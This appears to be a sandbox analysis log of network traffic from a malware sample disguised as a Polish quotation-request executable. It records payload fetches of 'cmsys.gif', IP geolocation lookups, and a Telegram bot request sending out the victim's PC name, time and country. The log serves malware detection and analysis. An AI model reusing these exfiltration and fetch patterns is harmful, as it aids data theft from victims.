                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 192.168.2.5:49718 -> 188.114.97.3:443 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0044289D InternetQueryDataAvailable,InternetReadFile,1_2_0044289D
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VatNPFTcculonAy&MD=pDKKvD8Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20and%20Time:%2029/10/2024%20/%2023:58:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20849224%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
